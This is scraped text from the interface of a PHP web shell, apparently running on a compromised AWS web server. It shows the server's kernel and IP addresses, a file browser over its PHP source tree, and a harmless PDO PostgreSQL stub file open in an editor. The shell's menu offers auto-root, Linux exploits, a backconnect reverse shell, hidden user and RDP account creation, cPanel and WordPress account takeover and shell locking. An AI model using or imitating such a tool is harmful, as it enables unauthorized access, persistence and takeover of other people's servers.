Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 18.118.173.146
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
80 /
src /
ext /
pdo_pgsql /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
60
B
-rw-r--r--
config.m4
2.5
KB
-rw-r--r--
config.w32
676
B
-rw-r--r--
pdo_pgsql.c
2.86
KB
-rw-r--r--
pgsql_driver.c
33.38
KB
-rw-r--r--
pgsql_driver.stub.php
1.25
KB
-rw-r--r--
pgsql_driver_arginfo.h
3.57
KB
-rw-r--r--
pgsql_statement.c
19.97
KB
-rw-r--r--
php_pdo_pgsql.h
1.36
KB
-rw-r--r--
php_pdo_pgsql_int.h
3.69
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgsql_driver.stub.php
<?php /** @generate-function-entries */ // These are extension methods for PDO. This is not a real class. class PDO_PGSql_Ext { /** @return bool */ public function pgsqlCopyFromArray(string $tableName, array $rows, string $separator = "\t", string $nullAs = "\\\\N", ?string $fields = null) {} /** @return bool */ public function pgsqlCopyFromFile(string $tableName, string $filename, string $separator = "\t", string $nullAs = "\\\\N", ?string $fields = null) {} /** @return array|false */ public function pgsqlCopyToArray(string $tableName, string $separator = "\t", string $nullAs = "\\\\N", ?string $fields = null) {} /** @return bool */ public function pgsqlCopyToFile(string $tableName, string $filename, string $separator = "\t", string $nullAs = "\\\\N", ?string $fields = null) {} /** @return string|false */ public function pgsqlLOBCreate() {} /** @return resource|false */ public function pgsqlLOBOpen(string $oid, string $mode = "rb") {} /** @return bool */ public function pgsqlLOBUnlink(string $oid) {} /** @return array|false */ public function pgsqlGetNotify(int $fetchMode = PDO::FETCH_USE_DEFAULT, int $timeoutMilliseconds = 0) {} /** @return int */ public function pgsqlGetPid() {} }
Close